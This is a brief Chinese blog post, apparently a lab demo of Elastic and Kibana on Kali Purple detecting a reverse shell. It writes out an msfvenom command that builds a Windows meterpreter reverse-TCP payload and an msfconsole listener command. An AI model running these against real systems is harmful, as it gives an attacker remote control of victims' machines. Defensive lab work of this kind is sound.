在Kali Purple上安装Elastic和Kibana教程加演示 Reverse Shell 攻击被阻止了
Create Reverse Shell File:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.4 LPORT=4444 -f exe -o shell.exe
Start Reverse Shell Listener:
msfconsole -q -x "use multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.100.4; set lport 4444; exploit"
推荐阅读:
© 版权声明
THE END
暂无评论内容